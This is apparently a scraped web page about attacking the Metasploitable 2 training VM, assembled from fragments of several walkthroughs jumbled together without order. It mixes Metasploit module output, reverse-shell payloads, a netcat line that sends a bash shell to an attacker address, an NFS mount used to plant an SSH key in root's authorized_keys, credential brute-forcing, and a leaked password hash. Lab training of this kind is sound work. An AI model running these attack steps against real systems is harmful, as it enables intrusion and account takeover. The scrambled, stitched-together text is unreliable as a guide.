metasploitable 2 list of vulnerabilities

To begin using the Metasploit interface, open the Kali Linux terminal and type msfconsole. [*] USER: 331 Please specify the password. Commands end with ; or \g. SRVPORT 8080 yes The local port to listen on. DB_ALL_PASS false no Add all passwords in the current database to the list Just enter ifconfig at the prompt to see the details for the virtual machine. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. Start/Stop Stop: Open services.msc. We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit. RPORT 5432 yes The target port In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. . [*] Banner: 220 (vsFTPd 2.3.4) Module options (exploit/linux/local/udev_netlink): payload => java/meterpreter/reverse_tcp [*] Writing to socket B SMBUser no The username to authenticate as When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. Metasploitable 2 Among security researchers, Metasploitable 2 is the most commonly exploited online application. 0 Automatic Target Perform a ping of IP address 127.0.0.1 three times. [*] Attempting to automatically select a target Id Name Highlighted in red underline is the version of Metasploit. Once Metasploitable 2 is up and running and you have the IP address (mine will be 10.0.0.22 for this walkthrough), then you want to start your scan. We will do this by hacking FTP, telnet and SSH services. This document outlines many of the security flaws in the Metasploitable 2 image. In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. Metasploitable 2 is a straight-up download. 
The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module. Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for. [*] Command: echo qcHh6jsH8rZghWdi; The root directory is shared. Metasploitable is installed, msfadmin is user and password. [*] Automatically selected target "Linux x86" Using Exploits. Lets move on. RHOSTS => 192.168.127.154 After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. The following sections describe the requirements and instructions for setting up a vulnerable target. USER_AS_PASS false no Try the username as the Password for all users Set Version: Ubuntu, and to continue, click the Next button. Id Name First, from the terminal of your running Metasploitable2 VM, find its IP address.. Reference: Linux IP command examples Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM. [*] Writing to socket B Lets go ahead. URI => druby://192.168.127.154:8787 The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below. msf auxiliary(postgres_login) > show options This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp The web server starts automatically when Metasploitable 2 is booted. msf exploit(distcc_exec) > exploit Metasploitable 2 is a deliberately vulnerable Linux installation. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. 
For more information on Metasploitable 2, check out this handy guide written by HD Moore. payload => cmd/unix/reverse VERBOSE false no Enable verbose output RHOST yes The target address The risk of the host failing or becoming infected is intensely high. [*] Accepted the first client connection To proceed, click the Next button. msf exploit(usermap_script) > show options - Cisco 677/678 Telnet Buffer Overflow . The primary administrative user msfadmin has a password matching the username. This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. In this example, the URL would be http://192.168.56.101/phpinfo.php. The purpose of this video is to create a virtual networking environment to learn more about ethical hacking using the Metasploit Framework available in Kali Linux. Mutillidae has numerous different types of web application vulnerabilities to discover and with varying levels of difficulty to learn from and challenge budding Pentesters. We're going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attacker's machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! [*] Auxiliary module execution completed, msf > use exploit/linux/postgres/postgres_payload Let's see if we can really connect without a password to the database as root. Set the SUID bit using the following command: chmod 4755 rootme. ---- --------------- -------- ----------- msf exploit(tomcat_mgr_deploy) > show option msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse RPORT 139 yes The target port msf > use exploit/multi/misc/java_rmi_server Here's what's going on with this vulnerability. URI /twiki/bin yes TWiki bin directory path [*] Matching Totals: 2 Items.
[*] Scanned 1 of 1 hosts (100% complete) Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. [*] B: "ZeiYbclsufvu4LGM\r\n" Mitigation: Update . Once we get a clear vision on the open ports, we can start enumerating them to see and find the running services alongside their version. Set Version: Ubuntu, and to continue, click the Next button. Here is a brief outline of the environment being used: First we need to list what services are visible on the target: This shows that NFS (Network File System) uses port 2049 so next lets determine what shares are being exported: The showmount command tells us that the root / of the file system is being shared. USERNAME no The username to authenticate as The Metasploit Framework from Rapid7 is one of the best-known frameworks in the area of vulnerability analysis, and is used by many Red Teams and penetration testers worldwide. [*] Reading from socket B Backdoors - A few programs and services have been backdoored. A list that may be useful to readers that are studying for a certification exam or, more simply, to those who just want to have fun! RHOSTS => 192.168.127.154 The -Pn flag prevents host discovery pings and just assumes the host is up. In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154. . msf exploit(twiki_history) > set RHOST 192.168.127.154 In the next section, we will walk through some of these vectors. Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1]. msf exploit(tomcat_mgr_deploy) > exploit [*] A is input RPORT 6667 yes The target port We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. 0 Generic (Java Payload) (Note: See a list with command ls /var/www.) 
root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor Module options (auxiliary/scanner/smb/smb_version): What is Metasploit? This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. [*] Writing to socket A By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag. msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink msf auxiliary(smb_version) > show options msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true 0 Automatic LHOST => 192.168.127.159 There are a number of intentionally vulnerable web applications included with Metasploitable. URIPATH no The URI to use for this exploit (default is random) [*] Reading from socket B daemon, whereis nc TWiki is a flexible, powerful, secure, yet simple web-based collaboration platform. Step 8: Display all the user tables in information_schema. DATABASE template1 yes The database to authenticate against So, as before with MySQL, it is possible to log into this database, but we have checked for the available exploits of Metasploit and discovered one which can further the exploitation: The Postgres account may write to the /tmp directory on some standard Linux installations of PostgreSQL and source the UDF Shared Libraries from there, enabling arbitrary code execution. From the shell, run the ifconfig command to identify the IP address. This must be an address on the local machine or 0.0.0.0 Metasploitable is a Linux virtual machine that is intentionally vulnerable. In Metasploit, an exploit is available for the vsftpd version. Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). 15.
This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" followed by a system command to the server on any listening port. [*] Accepted the second client connection msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154 Both operating systems will be running as VMs within VirtualBox. SESSION => 1 Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting Windows operating systems using Metasploit. Module options (exploit/multi/http/tomcat_mgr_deploy): msf exploit(twiki_history) > exploit [*] Writing to socket B TOMCAT_USER no The username to authenticate as [-] Exploit failed: Errno::EINVAL Invalid argument STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host VM version = Metasploitable 2, Ubuntu 64-bit Kernel release = 2.6.24-16-server IP address = 10.0.2.4 Login = msfadmin/msfadmin NFS Service vulnerability First we need to list what services are visible on the target: Performing a port scan to discover the available services using the Network Mapper 'nmap'. 0 Automatic Have you used Metasploitable to practice Penetration Testing?
Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state . [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) 865.1 MB. The login for Metasploitable 2 is msfadmin:msfadmin. This is Bypassing Authentication via SQL Injection. The nmap command uses a few flags to conduct the initial scan. An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. For your test environment, you need a Metasploit instance that can access a vulnerable target. [*] Auxiliary module execution completed, msf > use exploit/unix/webapp/twiki_history We chose to delve deeper into TCP/5900 - VNC and used the Metasploit framework to brute force our way in with what ended up being a very weak . I thought about closing ports but i read it isn't possible without killing processes. 0 Automatic [*] Accepted the second client connection Once the VM is available on your desktop, open the device, and run it with VMWare Player. STOP_ON_SUCCESS => true And this is what we get: Differences between Metasploitable 3 and the older versions. [*] Reading from sockets The two dashes then comment out the remaining Password validation within the executed SQL statement. Sources referenced include OWASP (Open Web Application Security Project) amongst others. LHOST => 192.168.127.159 ---- --------------- -------- ----------- msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154 Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). Then start your Metasploit 2 VM, it should boot now. Learn Ethical Hacking and Penetration Testing Online. Exploit target: But unfortunately everytime i perform scan with the . 
Tip How to use Metasploit commands and exploits for pen tests These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. PASSWORD => tomcat [*] 192.168.127.154:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) Step 7: Bootup the Metasploitable2 machine and login using the default user name and Password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. whoami https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. msf exploit(usermap_script) > set payload cmd/unix/reverse msf exploit(udev_netlink) > exploit Step 2:Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. [*] B: "qcHh6jsH8rZghWdi\r\n" Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image.
An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system. [*] Reading from socket B Return to the VirtualBox Wizard now. [*] Started reverse handler on 192.168.127.159:4444 RPORT => 445 LPORT 4444 yes The listen port Restart the web server via the following command. If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200. payload => cmd/unix/reverse Therefore, well stop here. [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' [*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300 root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. The version range is somewhere between 3 and 4. In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. RHOST => 192.168.127.154 SRVHOST 0.0.0.0 yes The local host to listen on. With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time: You can edit any TWiki page. One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". LHOST => 192.168.127.159 It is also instrumental in Intrusion Detection System signature development. 
echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539] RHOST yes The target address msf exploit(java_rmi_server) > exploit From the results, we can see the open ports 139 and 445. [*] 192.168.127.154:5432 Postgres - Disconnected UnrealIRCD 3.2.8.1 Backdoor Command Execution | Metasploit Exploit Database (DB) SMBPass no The Password for the specified username Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. Utilizing login / password combinations suggested by theUSER FILE, PASS FILE and USERPASS FILE options, this module tries to validate against a PostgreSQL instance. Unlike other vulnerable virtual machines, Metasploitable focuses on vulnerabilities at the operating system and network services layer instead of custom, vulnerable . It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. msf exploit(java_rmi_server) > set RHOST 192.168.127.154 The Nessus scan showed that the password password is used by the server. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. msf exploit(distcc_exec) > set LHOST 192.168.127.159 Tutorials on using Mutillidae are available at the webpwnized YouTube Channel. SSLCert no Path to a custom SSL certificate (default is randomly generated) msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787 High-end tools like Metasploit and Nmap can be used to test this application by security enthusiasts. Module options (exploit/unix/webapp/twiki_history): Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. 
Module options (exploit/linux/postgres/postgres_payload): :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead CVE is a list of publicly disclosed cybersecurity vulnerabilities that is free to search, use, and incorporate into products and services, per the terms of use. Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. Copyright (c) 2000, 2021, Oracle and/or its affiliates. In the current version as of this writing, the applications are. RHOSTS yes The target address range or CIDR identifier XSS via any of the displayed fields. There was however an error generated though this did not stop the ability to run commands on the server including ls -la above and more: Whilst we can consider this a success, repeating the exploit a few times resulted in the original error returned. Attackers can implement arbitrary commands by defining a username that includes shell metacharacters. [*] Reading from socket B NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The list is organized in an interactive table (spreadsheet) with the most important information about each module in one row, namely: Exploit module name with a brief description of the exploit List of platforms and CVEs (if specified in the module) You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. Vulnerability assessment tools or scanners are used to identify vulnerabilities within the network. A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. 
-- ---- Name Current Setting Required Description set PASSWORD postgres Since we noticed previously that the MySQL database was not secured by a password, were going to use a brute force auxiliary module to see whether we can get into it. The vulnerabilities identified by most of these tools extend . payload => cmd/unix/interact Id Name VHOST no HTTP server virtual host [*] B: "7Kx3j4QvoI7LOU5z\r\n" Proxies no Use a proxy chain [+] Found netlink pid: 2769 Associated Malware: FINSPY, LATENTBOT, Dridex. Exploit target: Name Current Setting Required Description LHOST => 192.168.127.159 To access a particular web application, click on one of the links provided. Id Name Exploit target: S /tmp/run I am new to penetration testing . msf exploit(drb_remote_codeexec) > exploit VHOST no HTTP server virtual host In order to proceed, click on the Create button. ---- --------------- -------- ----------- :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead. msf exploit(vsftpd_234_backdoor) > show payloads ---- --------------- -------- ----------- Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database. Inject the XSS on the register.php page.XSS via the username field, Parameter pollutionGET for POSTXSS via the choice parameterCross site request forgery to force user choice. Alternatively, you can also use VMWare Workstation or VMWare Server. Set-up This . The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Return to the VirtualBox Wizard now. 
For a more up-to-date version visit: This version will not install on Metasploitable due to out-of-date packages so best to load it onto a Linux VM such as Kali or Ubuntu. Step 4: Display Database Version. [*] Accepted the first client connection Description. Display the contents of the newly created file. In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. tomcat55, msf > use exploit/linux/misc/drb_remote_codeexec [*] Matching It requires VirtualBox and additional software. NOTE: Compatible payload sets differ on the basis of the target selected. [*] Writing to socket B [*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2021-02-06 23:31:44 +0300 This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). :14747:0:99999:7::: The Nessus scan that we ran against the target demonstrated the following: It is possible to access a remote database server without a password. [*] Started reverse handler on 192.168.127.159:4444 [+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres' ---- --------------- -------- ----------- Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). msf exploit(usermap_script) > show options To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user. On Metasploitable 2, there are many other vulnerabilities open to exploit. ---- --------------- -------- ----------- Getting started Do you have any feedback on the above examples? In this article we continue to demonstrate discovering & exploiting some of the intentional vulnerabilities within a Metasploitable penetration testing target. [*] Found shell. 
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. The same exploit that we used manually before was very simple and quick in Metasploit. Id Name Id Name RPORT 3632 yes The target port Module options (auxiliary/scanner/postgres/postgres_login): Here are the outcomes. [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 Name Current Setting Required Description Step 3: Always True Scenario. Name Current Setting Required Description Metasploitable 3 is a build-it-on-your-own-system operating system. Welcome to the MySQL monitor. You'll need to take note of the inet address. We have found the following appropriate exploit: TWiki History TWikiUsers rev Parameter Command Execution. msf exploit(distcc_exec) > show options Heres a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses the random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. So I'm going to exploit 7 different remote vulnerabilities , here are the list of vulnerabilities. We againhave to elevate our privileges from here. msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat This is about as easy as it gets. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. You could log on without a password on this machine. Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. 
RHOST => 192.168.127.154 Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: RHOST 192.168.127.154 yes The target address So, let's set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse However this host has old versions of services, weak passwords and encryption. Description: In this video I will show you how to exploit remote vulnerabilities on Metasploitable-2. Loading of any arbitrary web page on the Internet or locally including the site's password files. Phishing. SQL injection to dump all usernames and passwords via the username field or the password field. XSS via any of the displayed fields. Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. -- ---- The FTP server has since been fixed but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so let's try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution. (Note: A video tutorial on installing Metasploitable 2 is available here.) msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless.